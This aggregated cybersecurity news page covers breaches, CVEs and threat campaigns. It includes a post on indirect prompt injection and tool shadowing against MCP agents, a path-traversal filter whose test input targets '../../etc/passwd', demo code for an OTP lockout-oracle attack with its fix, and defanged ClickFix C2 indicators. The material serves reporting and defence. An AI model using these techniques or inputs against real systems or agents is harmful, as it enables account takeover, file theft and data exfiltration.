Cybersecurity News and Vulnerability Aggregator
Top Cybersecurity Stories Today
The Glassworm botnet targeting developers in software supply-chain attacks has been disrupted after researchers took down its resilient command-and-control infrastructure relying on Solana blockchain transactions and the BitTorrent DHT network. [...]
The FBI warned on Tuesday that the Silent Ransom Group (SRG) extortion gang is now targeting U.S.-based law firms in in-person data theft attacks. [...]
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has given U.S. federal agencies four days to secure their servers against a critical vulnerability in the LiteSpeed cPanel user-end plugin, which is actively being exploited in attacks. [...]
Hackers exploited a critical zero-day vulnerability in a server running the KnowledgeDeliver learning management system (LMS) to deploy the Godzilla web shell. [...]
Latest
A week after Dutch FIOD seized 800+ servers, the hosting network's ASN (AS209847) is still scanning at its normal daily rate
After FIOD seized 800+ servers and arrested two operators on May 18, the ELLIO research team reports that scanning from the network's ASN ranges has continued largely uninterrupted. While roughly a third of the recently active ranges (including the legacy Stark blocks 94.131.105.0/24 and 92.118.232.0/24) have since been withdrawn from global routing, the surviving ranges under AS209847 (WorkTitans / THE.Hosting) are still announced and still scanning at the network's normal daily rate. The sibling ASNs (AS213999 and the Moscow-based AS33993) remain routed and idle. The recent activity skews toward database and ICS/SCADA discovery (MongoDB, Redis, PostgreSQL, Oracle, LDAP, plus DNP3 and EtherNet/IP), alongside known-exploit probes such as CVE-2017-17215 and WinRM.
GitHub - facebook/mcpguard-dynamic: Kernel-level eBPF sandbox for securing LLM agent tool calls made through the Model Context Protocol (MCP)
MCP currently lacks context isolation. This makes it highly susceptible to threat vectors like tool shadowing (registering malicious tools with identical names), data exfiltration, and dynamic tool modification post-deployment. Meta released a new open source project addressing a major attack surface in Agentic AI architectures, "indirect prompt injections": basically hiding malicious text in a tool description or a web page that the AI reads, to trick the AI into stealing data or executing bad code. It does:

* Input/Output Sanitization: real-time monitoring of prompts, memory updates, and system tool calls.
* Three-Tier Pipeline: combines deterministic regex-based gatekeeping (blocking primitive string manipulations and file system path traversals) with semantic neural networks and LLM-driven arbitration for edge cases.
* Performance: handles the first layer of defense with sub-2ms processing delays to avoid choking agent workflows.

Thought this would be of interest to anyone dealing with AppSec for LLM apps or defending autonomous agent infrastructure.
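The post mentions a deterministic first tier that blocks file system path traversal in tool calls. As an added illustration of what such a gate looks like (written for this page, not code from mcpguard-dynamic), here is a small Python check over MCP `tools/call` requests. The workspace root, the argument names treated as paths, and the sample requests are all assumptions.

```python
import posixpath

WORKSPACE = "/srv/agent/workspace"                      # assumed policy root
PATH_ARGS = {"path", "file", "filename", "src", "dst"}  # assumed arg names that carry paths


def within_workspace(path, root=WORKSPACE):
    """Deterministic check: normalize the path and require the result to stay
    under root. Relative paths are taken relative to root; '..' escapes and
    absolute paths outside root are rejected. Symlinks are deliberately not
    resolved here: that needs the live filesystem and belongs to a later,
    kernel-side tier."""
    candidate = path if path.startswith("/") else posixpath.join(root, path)
    normalized = posixpath.normpath(candidate)
    return normalized == root or normalized.startswith(root + "/")


def gate_tool_call(call):
    """First-tier gate for an MCP tools/call request shaped as
    {"name": ..., "arguments": {...}}. Returns (allowed, reason)."""
    for key, value in call.get("arguments", {}).items():
        if key not in PATH_ARGS or not isinstance(value, str):
            continue
        if "\x00" in value:
            return False, f"{key}: NUL byte in path"
        if not within_workspace(value):
            return False, f"{key}: escapes workspace ({value})"
    return True, "ok"


# Constructed sample requests (not captured traffic).
CALLS = [
    {"name": "read_file", "arguments": {"path": "notes/todo.md"}},
    {"name": "read_file", "arguments": {"path": "../../etc/passwd"}},
    {"name": "read_file", "arguments": {"path": "/srv/agent/workspace/../workspace/a.txt"}},
    {"name": "write_file", "arguments": {"path": "/srv/agent/workspace2/x", "content": "hi"}},
]


def gate_all(calls):
    """Verdict per request: [True, False, True, False] for CALLS above."""
    return [gate_tool_call(call)[0] for call in calls]


if __name__ == "__main__":
    for call, verdict in zip(CALLS, gate_all(CALLS)):
        print(verdict, call["arguments"])
```

Note the fourth request: a prefix check against the bare root string would accept `/srv/agent/workspace2`, which is why the check compares against `root + "/"`.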
When an employee installs an AI writing assistant, connects a coding copilot to their IDE, or starts summarizing meetings with a new browser tool, they are doing exactly what a productive employee should do: finding faster ways to work. Across most organizations today, employees are running three to five AI tools on any given day. Most were never reviewed by IT. A significant portion connects
Threat Intel: Lithuania Investigates B2B Credential Misuse Exposing 600,000 National Registry Records
The Lithuanian Prosecutor General's Office and the Criminal Police Bureau have initiated a joint investigation into a large-scale data exfiltration incident targeting the **State Enterprise Centre of Registers**. The incident involved the unauthorized copying of over 600,000 records from the country's national Real Estate and Legal Entities Registers. Rather than exploiting an unpatched software vulnerability, the attack relied on a classic trust-boundary compromise.

**The Entry Vector: Cross-Agency Credential Misuse (MITRE T1078)**

Forensic tracking indicates that the threat actors executed a series of unauthorized connections originating from foreign infrastructure. The entry vector relied on valid, high-privilege B2B institutional login credentials assigned to external state departments authorized to query the central registry database. Independent statements from legislative and defense officials suggest the specific access pathway was carved out by compromising authenticated accounts belonging to the **Department of Migration under the Ministry of the Interior**. By hijacking these valid inter-agency connection points, the threat actors bypassed perimeter barriers, allowing them to issue massive queries to the backend database without triggering immediate anomaly blocks.

**Exfiltration Scope & Impact Profile**

The breach was initially identified by internal monitoring in early April 2026, but public disclosure was delayed due to the ongoing criminal inquiry. The exfiltrated data consists of:

* Full legal names, dates of birth, and unique national identification numbers.
* Registered physical addresses, corporate entity structures, and detailed cadastral/property registry extracts.

The Centre of Registers has confirmed that primary consumer-facing fields, such as telephone contact details, email addresses, bank account numbers, or raw cadastral measurement files, were not part of the exfiltrated datasets.

The primary operational risk is tactical intelligence gathering. Security analysts have pointed out that bulk access to unlisted residential addresses linked to legal entities can be leveraged by foreign intelligence services for target profiling, spear-phishing orchestration, or coercion of state personnel, diplomats, and military figures.

**Incident Response & Remediation**

Following the identification of the unauthorized bulk queries, the Centre of Registers implemented the following controls:

1. Immediate revocation and blocking of all compromised inter-agency institutional accounts.
2. Mandatory credential rotation and strict query-volume throttling across all API and web self-service gateways linked to external state dependencies.

Separately, the director of the Centre of Registers, Adrijus Jusas, formally stepped down on May 25 following administrative scrutiny regarding legacy IT infrastructure and monitoring gaps. While independent defense officials note the incident matches the operational signatures of state-aligned hybrid surveillance operations, official attribution from the Prosecutor General's Office remains open.
Cybersecurity researchers have disclosed a security flaw in Gitea, an open-source, self-hosted platform for version control, that allows unauthenticated remote attackers to pull private container images from Gitea deployments without requiring an account, password, or other credentials. The vulnerability, tracked as CVE-2026-27771 (CVSS score: N/A), affects all versions of Gitea prior to 1.26.2
The Dutch National Police arrested a 35-year-old man suspected of hacking the professional football club Ajax Amsterdam (AFC Ajax) earlier this year. [...]
Microsoft has released the KB5089573 preview cumulative update for Windows 11 versions 25H2 and 24H2, which comes with 30 changes, including performance and reliability improvements. [...]
Microsoft has warned of an active cryptojacking campaign that makes use of artificial intelligence (AI) chatbot interactions as a mechanism for surfacing malicious download sites. "This emerging delivery technique extends social engineering beyond conventional search results and increases the visibility of malicious software recommendations," Microsoft Defender Experts and the Microsoft
TL;DR: Visit https://sshlabs.compass-security.training to learn more about SSH security. Introduction SSH is a widely used protocol that provides secure access to remote systems. It enables encrypted communication, file transfers, command execution and shell access for system administration. However, when misconfigured, poorly secured or used in an unsafe way, SSH can become an attack vector for attackers. When we perform Linux hardening or infrastructure reviews , we often see that SSH is not used securel
Some internet connectivity is returning in Iran after nearly 90 days offline, web monitoring groups say. But it isn’t clear if the reconnection is permanent.
The Iranian hacking group known as MuddyWater has been linked to a new campaign affecting at least nine organizations across nine countries on four continents in the first quarter of 2026. The activity targeted industrial and electronics manufacturing, education and public-sector bodies, financial services, and professional services, per the Threat Hunter Team from Symantec and Carbon Black.
Encrypted DNS in 2026: DoH, DoT, DoQ and DoH3 protocol comparison — including DNS hijacking attack vectors and what each protocol actually prevents
The security angle on encrypted DNS is often oversimplified. DoH prevents ISP-level snooping and basic DNS hijacking, but doesn't protect against a compromised resolver. DoT is easier to detect and block, which has real implications for threat actors trying to exfiltrate via DNS. DoQ is interesting from a security perspective because QUIC's connection ID migration makes traffic correlation harder. Article includes benchmark data and practical server config — but mostly written for the "which threat model does each protocol address" question.
I published a technical write-up on an old OLX account takeover issue. The core bug was an OTP correctness leak inside the rate-limit state. After repeated invalid OTP attempts, the application showed a lockout message. However, blocked submissions did not become response-equivalent. Invalid codes during lockout still produced the invalid-code signal. The valid code during lockout removed that signal while keeping the lockout message. That made the lockout state act as an oracle for whether the OTP was correct. The broader impact came from reuse of the verification flow across account paths, including recovery/reset-style flows, plus weak session revocation behavior after password change. The write-up focuses on the response-difference behavior, why the validity window mattered, how the issue escalated to account takeover, and why lockout states must stop leaking success/failure information.
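The lockout oracle described in that write-up is easy to reproduce in miniature. The Python below is an added illustration for this page, not the author's code or OLX's: the verifier classes, the attempt threshold, the response shape and the candidate list are all assumptions. The vulnerable verifier compares the code before consulting the lockout state, so the two kinds of locked response differ; the hardened one decides on lockout first and never touches the code.

```python
import hmac

MAX_ATTEMPTS = 5  # assumed lockout threshold


class VulnerableOtpVerifier:
    """Illustrative reconstruction of the oracle pattern (not OLX's code).
    The lockout check runs *after* the code comparison, so a wrong code during
    lockout still carries 'invalid_code' while the right code returns only
    'locked'. The responses are not equivalent, and that difference is the leak."""

    def __init__(self, code):
        self.code = code
        self.failures = 0

    def verify(self, submitted):
        locked = self.failures >= MAX_ATTEMPTS
        if not hmac.compare_digest(self.code, submitted):
            self.failures += 1
            errors = ["invalid_code"] + (["locked"] if locked else [])
            return {"ok": False, "errors": errors}
        if locked:
            return {"ok": False, "errors": ["locked"]}  # leaks that the code was right
        return {"ok": True, "errors": []}


class HardenedOtpVerifier(VulnerableOtpVerifier):
    """Lockout is decided before the code is compared, so every locked response
    is byte-for-byte identical regardless of the submitted value."""

    def verify(self, submitted):
        if self.failures >= MAX_ATTEMPTS:
            return {"ok": False, "errors": ["locked"]}
        if not hmac.compare_digest(self.code, submitted):
            self.failures += 1
            return {"ok": False, "errors": ["invalid_code"]}
        return {"ok": True, "errors": []}


def oracle_attack(verifier, candidates):
    """Attacker's view: burn the attempt budget with junk, then submit candidates
    during lockout and look for the single response that differs. Returns the
    recovered code, or None when all locked responses are equivalent."""
    for _ in range(MAX_ATTEMPTS):
        verifier.verify("junk")  # deliberately wrong: real codes are digits only
    distinguished = [c for c in candidates
                     if "invalid_code" not in verifier.verify(c)["errors"]]
    return distinguished[0] if len(distinguished) == 1 else None


# Constructed candidate list; a real sweep covers the whole code space inside
# the OTP's validity window, which is why that window mattered.
CANDIDATES = ["111111", "482913", "999999"]

if __name__ == "__main__":
    print(oracle_attack(VulnerableOtpVerifier("482913"), CANDIDATES))  # 482913
    print(oracle_attack(HardenedOtpVerifier("482913"), CANDIDATES))    # None
```

The general rule the example demonstrates: once a lockout (or rate limit) applies, the response must be computed from the lockout state alone, with the same status code, body and timing, and the secret must not be compared at all.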
There is no excerpt because this is a protected post. The post Protected: The State of AI Risk Management in 2026 appeared first on Heimdal Security Blog .
AI governance requires visibility into how AI tools interact with enterprise data. Varonis explains how its Atlas platform uses Claude Compliance API data to help monitor usage, investigate risk, and support compliance. [...]
SonicWall MFA bypasses are the kind of vulnerabilities that make defenders uncomfortable because they undermine one of the controls organizations trust most. When remote access infrastructure starts failing at the authentication layer, exposure scales very quickly.
Microsoft is testing a new Defender for Endpoint capability that will automatically isolate compromised endpoints to thwart attackers' attempts to move laterally across the network. [...]
Microsoft has rolled out updates to fix a remote code execution vulnerability impacting SharePoint that could be exploited by bad actors in attacks without requiring any specialized conditions to be met. The vulnerability, tracked as CVE-2026-45659, carries a CVSS score of 8.8. It has been assigned an important severity. "Deserialization of untrusted data in Microsoft Office SharePoint allows
Multi-factor authentication (MFA) was supposed to close a critical gap in identity security. It meant that, even if an attacker possessed the account credentials, they couldn't log in without the second factor. While that logic was sound, attackers have now figured out that they don't need to steal the second factor: they just need the user to hand it over. If your workforce authenticates with
As Americans stew over the looming risk of job-stealing AI and data centers in their back yards, the feds are raising the alarm about a new category of threat, documents obtained by WIRED show.
The Indian Computer Emergency Response Team (CERT-In) has issued new guidelines requiring organizations to patch critical security vulnerabilities in internet-exposed systems within 12 hours of being flagged where "feasible" to safeguard against potential threats stemming from threat actors' abuse of artificial intelligence (AI) tools and large language models (LLMs) to automate vulnerability
CISA has given U.S. government agencies until Wednesday evening to secure their servers against an SQL injection vulnerability in the Drupal content management system (CMS) that it flagged as actively exploited. [...]
Microsoft has confirmed a new known issue affecting Windows Server 2016 systems that causes domain controller lookups to fail after installing the KB5087537 May 2026 security update. [...]
The Iranian state-sponsored threat actor known as Nimbus Manticore (aka Screening Serpens and UNC1549) has been attributed to a fresh campaign using lures impersonating organizations in the aviation and software sectors across the U.S., Europe, and the Middle East following the joint U.S.-Israeli military campaign against the country in late February 2026. The activity, besides embracing
The ShinyHunters extortion gang stole the personal information of over 183,000 people after hacking the systems of convenience store chain giant 7-Eleven in April, according to data breach notification service Have I Been Pwned. [...]
Today, we welcome the 45th government onboarded to Have I Been Pwned's free gov service: Bhutan. The Bhutan Computer Incident Response Team, BtCIRT, now has access to monitor Bhutanese government domains against the data in HIBP. As Bhutan's national CIRT, BtCIRT is responsible for consuming threat intelligence and sharing relevant insights with its constituents, helping identify and respond to cyber risks affecting government services and the people who depend on them. This is exactly the sort of organisation the HIBP government service was built to support: national cybersecurity teams using breach data to identify leaked credentials and compromised databases associated with their government domains. BtCIRT now joins the growing list of national CIRTs and government cybersecurity teams using HIBP to better understand their exposure, respond quickly when new breaches appear, and reduce the risk posed by compromised credentials before attackers can take advantage.
# The Problem

AI can now analyze code so well that it can spot software vulnerabilities in just seconds. If you want a vivid explanation, Theo (t3.gg) breaks it down [here](https://www.youtube.com/watch?v=M_HxHr7du5M).

To make it simple: for decades, three assumptions kept software more secure, and now none of them hold up.

First: finding exploits took highly paid experts. That's what kept attackers limited. AI erased that overnight. Now anyone with enough computing power and a model can zero in on vulnerabilities in real software in minutes.

Second: the 90-day window for coordinated disclosure was supposed to be enough time. If you spotted a bug, maintainers had 90 days to patch and roll it out before everyone found out. That relied on assumption one. Without it, the window vanishes: two independent researchers found a huge Linux kernel exploit within nine hours of each other.

Third: going from patch to a working exploit was hard. Maintainers used to merge fixes quietly, with bland commit messages, hoping to buy time before attackers figured it out. AI ended that, too. Feed a four-line code diff into an AI model, ask if it looks like a security patch, and two out of three major models nail it right away, without reading the commit message. The pipeline from patch to exploit is now automatable.

So every piece of software, especially open-source, is exposed to zero-days at a speed and scale no one has seen before. And as AI keeps improving, it only gets worse. Vulnerabilities are found faster and faster, but patching sticks to its old pace. That gap grows every month.

# Why Conventional Responses Are Not Enough

**Patching Faster**

The obvious answer is patching faster. If AI finds bugs quicker, use it to patch them faster, too. Sure, you shave off some risk around the edges, but it changes nothing fundamental. The attack surface never shrinks. AI scanners just jump to the next bug. Patching faster is like sprinting on a treadmill: you're not getting off it.

**Getting Rid of Open-Source**

More drastic: kill open-source. If the source isn't public, AI can't analyze it directly. For a brief moment, that might slow things down. But it won't stop AI for long. Without source code, AI can reverse-engineer binaries. Obfuscation slows that, but then we're locked in a never-ending battle of AI obfuscation versus AI deobfuscation, with no clear winner. If your software runs strictly on the backend and never gets distributed, attackers just probe the backend via its public interfaces with crafted requests. AI is fantastic at that, too.

Honestly, we all love open-source. It's one of the most powerful drivers software has ever had. Closing it would be a huge loss with minimal security advantage. The answer here is no.

# The Root Cause: Too Much to Attack

Both patching faster and hiding source code try to win the same race with AI. Neither deals with why this race is so brutal. The real issue is the size of the attack surface. A typical production app pulls in hundreds of third-party libraries. Each of those pulls in more. The code available for AI to scan is a hundred times bigger than what the developer actually wrote. Most of it has never been read or audited by anyone on the team. It's all public, constantly scanned, and grows with every install.

Attackers now target code developers trusted, not just code developers wrote themselves. Look at supply chain attacks: the 84 Tanstack packages compromised, CopyFail exploits in Python libraries, CI pipeline attacks. They all exploited dependencies, not application logic.

If you can't win by running faster, shrink what you're racing to protect.

# Making Software Easier to Patch: The Visual Programming Direction

One practical way forward is to make patching easier by breaking apps into small, independently replaceable parts.
The finer the granularity, the better: smaller components mean you can replace or isolate just the affected piece without shutting down or rewriting large chunks of the application. A vulnerability in one small component should stay contained, not cascade through the system.

Plugin architectures take this approach. Smaller parts mean smaller attack surfaces, and you can patch just the component instead of the whole system. But plugins still rely on third-party libraries, so the attack surface doesn't really shrink. Plugin systems also pile on their own headaches: more to manage, compatibility issues between versions, more complexity as the number of plugins grows. Many of these problems come down to tight coupling. Plugins are still deeply wired into the host application, making them harder to replace cleanly than they appear.

Microservices were designed specifically to address this. By moving to a loosely coupled architecture where each service communicates through explicit, well-defined interfaces, you get true independence: one service can be replaced, redeployed, or taken offline without touching the others. A vulnerability in one service stays isolated. But for most projects, the overhead becomes the real problem. Dozens of services means dozens of APIs to version, monitor, secure, and keep compatible. The infrastructure cost (service discovery, load balancing, distributed tracing, inter-service authentication) can dwarf the original application. This is why many small and mid-size teams are moving away from microservices toward modular monoliths. The cure became more expensive than the disease.

The pattern is consistent across all these approaches: the finer the granularity, the better the control, but the higher the cost. More infrastructure, more interfaces to maintain, and a mental model of how everything connects that gets increasingly hard to hold in your head. No text-based architectural approach has resolved this tension. It only moves it around.

Visual programming languages (VPLs) break this pattern. They offer maximum granularity, every block being its own independently replaceable component, while solving or mitigating the overhead problems that plague text-code solutions. This is what makes VPLs fundamentally better than any text-based architectural approach: the same granularity, with few or none of the downsides.

In a VPL, each block on a diagram acts as a standalone, replaceable component. Unlike text-based components, VPLs give full transparency: the logic is right there on the diagram. Any developer can look at it and quickly understand what the program does without digging through code. Swapping a block doesn't require recompilation; it just needs to fit with the blocks it connects to. Patching becomes as easy as drag-and-drop. These blocks are simple to replace and isolate. If one is compromised, you can disconnect or disable it immediately and interactively without recompiling, minimizing collateral damage while preparing a fix.

Transparency matters for security beyond just patching. With text, the logic connecting components is more hidden; you have to read code to understand it. In a visual program, it's laid out in the diagram. No room for hidden connections.

**Composable Blocks and the Visual Hierarchy**

A well-designed VPL goes further than a flat diagram of blocks. Blocks are composable: any block can contain other blocks inside it, forming a hierarchy of arbitrary depth. High-level business logic sits at the top. Each block can be opened to reveal its internal workflow. The hierarchy goes all the way down to the bottom level, where blocks contain no further sub-blocks. These are called leaf blocks, and they are the only place in the hierarchy where code lives.

This composability is what makes a VPL suitable for large, complex applications rather than toy examples. The top-level diagram stays clean and readable. Complexity is encapsulated inside blocks.
Any level of the hierarchy is independently replaceable without touching the rest.

There is another advantage that is easy to miss: increasing granularity in a VPL is trivial. In a text-based plugin or microservice architecture, splitting a component into finer pieces means rewriting code, updating interfaces, and often changing infrastructure: service registries, load balancers, deployment configurations. It is expensive enough that teams often avoid it even when they know finer granularity would be better. In a VPL, splitting a block into smaller sub-blocks is a visual operation. You open the block, draw the internal workflow, and connect the pieces. No infrastructure changes, no interface rewrites, no ripple effects through the rest of the system. The cost of increasing granularity drops to near zero, which means teams can afford to do it whenever it makes sense rather than only when the pain of not doing it becomes unbearable.

This is the compounding advantage of VPLs over all text-based architectural approaches: not just that maximum granularity is available, but that reaching and adjusting that granularity is effortless compared to anything else available today.

# The VPL Security Model: Shrinking the Attack Surface

**Third-Party Libraries as Visual Workflows**

People usually think a visual app replaces all its outside libraries with AI-generated code. That's not realistic. Libraries pack in too much functionality to recreate from scratch. The realistic scenario: third-party libraries become visual workflows themselves. In a VPL ecosystem, a library is a visual workflow with a bit of code at the leaves for OS interaction. Applications mix these library visuals with their own.

This changes everything for security. If you find a bug in a library, you can dive in and fix it right in its workflow, since you see everything. Or you can wait for a patched version and drop in the new block. No need for recompiling or risking breakage elsewhere. Either way, it's faster, more transparent, and less risky than patching opaque text-based libraries, where changing one thing might break another.

**The Leaf Code Layer: Where Vulnerability Lives**

At the bottom of visual hierarchies sit the leaf blocks, the only place for code. These handle things like OS calls, file reads, network connections: the low-level stuff. Leaf code can invoke text libraries. But you want to make dependencies here as thin as possible. The simpler the leaf code, the smaller the attack surface.

The first level of minimizing attack surface is AI code generation. If the dependency is small or simple, have AI build it directly instead of pulling in a library. That wipes out the dependency altogether: the new code isn't published anywhere, so there is no package for AI scanners to pull and study. It is still code that runs in your application and is reachable through the same public interfaces discussed above, so it needs the same review and testing as any other leaf code.

The second level, as AI capabilities grow, is direct visual workflow generation. Rather than generating text code, AI will be able to generate complete visual workflows with a thin leaf code layer. This makes dependency self-production an even more attractive option: the generated component is not just functional but transparent, composable, and fully auditable as a visual workflow.

If you have to use third-party stuff, prefer VPL-based libraries. You get transparency and easy patching. Their attack surface beats opaque text libraries any day.

When all these practices are applied together, the application approaches the ideal state: no or minimal third-party library dependencies and maximum use of VPL-based libraries, with the attack surface reduced to the operating system or close to it.

# Why Pipe Is the Right VPL

**The Gap No Existing VPL Has Closed**

Visual languages aren't new: LabVIEW owns engineering, Simulink rules in aerospace, Node-RED is all over IoT, Unreal Blueprints for games. None of them fit the broad security needs outlined here. They're either built for niche domains, or just can't handle production-level complexity.
To truly shrink attack surfaces in production apps, a VPL has to be general-purpose enough to cover any domain, and robust enough for real-world code. [Pipe](https://pipelang.com/) (pipelang.com) is built exactly for that. It's general-purpose and sophisticated enough to handle production-level applications anywhere. Seven years went into its architecture, ten provisional USPTO patents cover its design, and you can check out the full language spec at [pipelang.com](https://pipelang.com/).

**How Pipe Implements Block Interfaces: Domains and Overlaps**

In Pipe, each block input is analogous to an independent API endpoint. The interface of that endpoint is defined by a domain: a hierarchical data structure, a tree where each node can have both a value and children, similar to JSON but more expressive. Domains are assigned to block inputs and outputs. When two blocks hook up with different domains, Pipe resolves this with "overlaps": it lines up domain nodes with matching tree paths between the output and the input domains, passing data only between nodes where paths match. Unmatched nodes take explicitly defined or implicitly assumed default values. That means almost any two Pipe blocks connect easily, even if their interfaces don't match up cleanly, with some exceptions such as data type compatibility between source and destination domain nodes.

The domain overlap gives you flexible connections, making Pipe practical at scale. And Pipe guarantees interface contracts, so developers don't have to write structural validation at block boundaries. Note that the contract covers structure and data types; whether a value is safe to act on (a path, a query fragment, a URL) is still something the consuming leaf code has to check.

This makes Pipe's block interfaces more loosely coupled than even conventional API interfaces. A standard API requires both sides to agree on an exact contract: matching field names, types, and structure. Any mismatch means the developer must write adapter code, update the contract, or handle errors explicitly. Pipe's domain overlap mechanism removes that requirement entirely. Blocks connect regardless of interface differences, with the language resolving mismatches automatically through defaults. Pipe rejects connectivity only when data types are incompatible or when domain nodes are marked as mandatory in the overlap but missing. This is architecture at its loosest possible coupling: not just loosely coupled, but self-adapting, where the system resolves differences rather than the developer.

**Addressing the Drawing Effort Concern**

Some folks say visual diagrams take more effort to draw than typing plain code. Here's why that's not a problem. Pipe diagrams are naturally more compact. A block needing lots of input parameters doesn't need separate lines for each; one domain connection carries everything. Seven parameters, one connection. Diagrams stay neat, even as logic grows. Plus, Pipe lets you modify workflows with AI. Want to add blocks, reroute, restructure? Just describe it in natural language and Pipe does the work. Diagram maintenance gets as easy as telling the system what you want, not fussing with box placement.

# The Security Spectrum

Not every app can jump straight to Pipe with slim leaf code, but every step toward it is a serious security boost.

* **Step 1. Open-source text code and libraries:** entire source and dependencies open to AI scanning. Biggest possible attack surface.
* **Step 2. Closed-source text code with libraries:** source hidden, but binaries are reverse-engineerable, APIs exposed. Libraries still wide open.
* **Step 3. Pipe with some text libraries:** dramatically shrinks the attack surface, but remaining text libraries are still risky.
* **Step 4. Pipe with visual library workflows and thin leaf code:** almost no third-party library dependencies, only VPL-based ones. Attack surface drops down to mostly just the OS.

That last step is the end goal. You don't need to get there instantly or completely; even moving partway over is already a big improvement on old-school architectures.
# Conclusion

AI made finding vulnerabilities cheap, fast, and possible for just about anyone. Patching faster helps a bit, but doesn't address the real structural flaw. Killing open-source is a massive loss for little actual gain. The right answer? Reduce the attack surface.

Pipe, with libraries represented visually and leaf code kept thin for OS calls, gets you there. Everything is transparent and auditable at every level. You can isolate parts instantly. Patching is safer and faster. Supply chain risk from libraries is nearly gone. Remaining vulnerabilities shift to the OS, which the vendor maintains.

As AI generates more code faster, the need for VPLs such as Pipe will grow. The goal isn't making software bulletproof, but making it fundamentally harder to exploit. When your only attack surface left is the operating system, you've actually achieved that.
Anthropic appears to be preparing for the public rollout of the Mythos model, which was announced in April as a restricted model that poses major security risks to private and public software. [...]
Ciaran Martin says Reform UK leader’s allegation over Guardian report on £5m gift ‘entirely unsubstantiated’ Nigel Farage’s claim that a Russian hack was behind a Guardian report on the £5m gift he received from a crypto billionaire has been described as “without any merit” by a former head of the National Cyber Security Centre. Ciaran Martin, founding chief executive of the agency, which is part of GCHQ, said Farage’s allegation, if true, would have major implications for UK policy towards Russia but that the Reform UK leader had yet to provide “a shred of evidence”. Continue reading...
Authorities in the Netherlands have arrested the co-owners of two related Internet hosting companies for operating IT infrastructure used by Russia to carry out cyberattacks, influence operations and disinformation campaigns inside the European Union. The two men were the focus of a 2025 KrebsOnSecurity story about how their hosting companies had assumed control over the technical infrastructure of Stark Industries Solutions , an Internet service provider sanctioned last year by the EU as a frequent staging ground for cyber mischief from Russia’s intelligence agencies. An investigator with the Tax Intelligence and Investigation Service (FIOD), the Dutch financial crimes agency, during the raid. Image: FIOD. The Dutch daily news outlet de Volkskrant reports that the Dutch financial crime agency FIOD on May 18 arrested a 57-year-old from Amsterdam and a 39-year-old from The Hague, charging them with violating sanctions law by directly or indirectly making economic resources available to EU-sanctioned ent
The FBI is warning about the Kali365 phishing-as-a-service platform (PhaaS) that is used to hijack Microsoft 365 accounts by abusing OAuth device code authentication to steal session tokens and bypass multi-factor authentication (MFA). [...]
Threat actors are exploiting a recently disclosed critical security flaw in Ghost CMS to inject malicious JavaScript code with an aim to fuel ClickFix attacks. According to QiAnXin XLab, the activity involves the exploitation of CVE-2026-26980 (CVSS score: 9.4), an SQL injection vulnerability in Ghost's Content API that could allow an unauthenticated attacker to read arbitrary data from the
Ask a cybersecurity pro about Network Detection and Response (NDR) and you might still hear "Noisy," "Too much data." But ask the teams running NDR that includes agentic AI capabilities and you'll hear they're actually using it to catch threats earlier, triage faster, and chase fewer false positives. The old complaint lingers in part because reputations are sticky, and because NDR has evolved
As attackers ramp up their AI exploit development, the search for software vulnerabilities is changing rapidly.
Cybersecurity researchers have shed light on a cross-platform malware called RemotePE that has been put to use by the North Korea-linked Lazarus Group in attacks targeting financial and cryptocurrency organizations. RemotePE, per NCC Group subsidiary Fox-IT, is part of a multi-stage attack chain that involves two loaders tracked as DPAPILoader and RemotePELoader. "DPAPILoader decrypts and
To reduce the amount of noise from questions, we have disabled self-posts in favor of a unified questions thread every week. Feel free to ask any question about reverse engineering here. If your question is about how to use a specific tool, or is specific to some particular target, you will have better luck on the [Reverse Engineering StackExchange](http://reverseengineering.stackexchange.com/). See also /r/AskReverseEngineering.
Well, that didn't last long! Recording this on Saturday morning my time, I observed ShinyHunters having gone quiet since the massive haul that would have been the Instructure ransom. It was two weeks almost to the hour since I'd first heard rumour of payment being made, and I posited that groups like this often go quiet after they feel the heat, only to emerge shortly after, the drug that is hacking being too strong to ignore. Anyway, here we now are: ShinyHunters Claims 3 New Victims https://t.co/v8Wf457Gbp : U.S.-based dental benefits administrator and oral health company. Charter Communications, Inc.: U.S. telecommunications and cable company best known for Spectrum internet, TV, mobile, and phone services. … pic.twitter.com/epWcVVGRHa — Dark Web Informer (@DarkWebInformer) May 22, 2026 DentaQuest has since been removed, but their website is currently returning "Access Denied", which isn't a great look. Obviously, the broken website doesn'
Plus: Google publishes a live exploit for an unpatched flaw, the feds arrest two men accused of creating thousands of nonconsensual deepfake nudes, and more.
Cybersecurity researchers have flagged a fresh software supply chain attack campaign that has targeted multiple PHP packages belonging to Laravel-Lang to deliver a comprehensive credential-stealing framework. The affected packages include - laravel-lang/lang laravel-lang/http-statuses laravel-lang/attributes laravel-lang/actions "The timing and pattern of the newly published tags
Just added an interactive security map to my project NoEyes showing exactly what the server sees (and doesn't)
repo : [https://github.com/Ymsniper/NoEyes](https://github.com/Ymsniper/NoEyes)
Lawmakers in both houses of Congress are demanding answers from the U.S. Cybersecurity & Infrastructure Security Agency (CISA) after KrebsOnSecurity reported this week that a CISA contractor intentionally published AWS GovCloud keys and a vast trove of other agency secrets on a public GitHub account. The inquiry comes as CISA is still struggling to contain the breach and invalidate the leaked credentials. On May 18, KrebsOnSecurity reported that a CISA contractor with administrative access to the agency’s code development platform had created a public GitHub profile called “ Private-CISA ” that included plaintext credentials to dozens of internal CISA systems. Experts who reviewed the exposed secrets said the commit logs for the code repository showed the CISA contractor disabled GitHub’s built-in protection against publishing sensitive credentials in public repos. CISA acknowledged the leak but has not responded to questions about the duration of the data exposure. However, experts who reviewed the now-defunct Private-CISA archive said it was originally created in November 2025, and that it exhibits a pattern consistent with an individual operator using the repository as a working scratchpad o
Harvard and ~140 other compromised legitimate sites are now spreading ClickFix malware.

hxxps://hir.harvard.edu/israel-and-international-football-a-breaking-point/
hxxps://hir.harvard.edu/a-better-way-forward-an-interview-with-paul-ryan/

Both contain a remote load script in their HTML that reverses its C2 `sj.ssc/ipa/orp.eralfduolccitats` to original form and then displays the ClickFix box from it.

C2: hxxps://staticcloudflare.pro

AnyRun identifies the loading pattern well:

* [https://app.any.run/tasks/2ac73567-8bdf-41b0-999e-08057deb3dd3](https://app.any.run/tasks/2ac73567-8bdf-41b0-999e-08057deb3dd3)
* [https://app.any.run/tasks/8362c5f5-11ab-4b34-b7a5-8e2fb2d6355c](https://app.any.run/tasks/8362c5f5-11ab-4b34-b7a5-8e2fb2d6355c)

Sandbox detonation of one of the ClickFix payloads: [https://app.any.run/tasks/bf4b5c8d-f76d-4398-b465-9a1d8ec899bb](https://app.any.run/tasks/bf4b5c8d-f76d-4398-b465-9a1d8ec899bb)

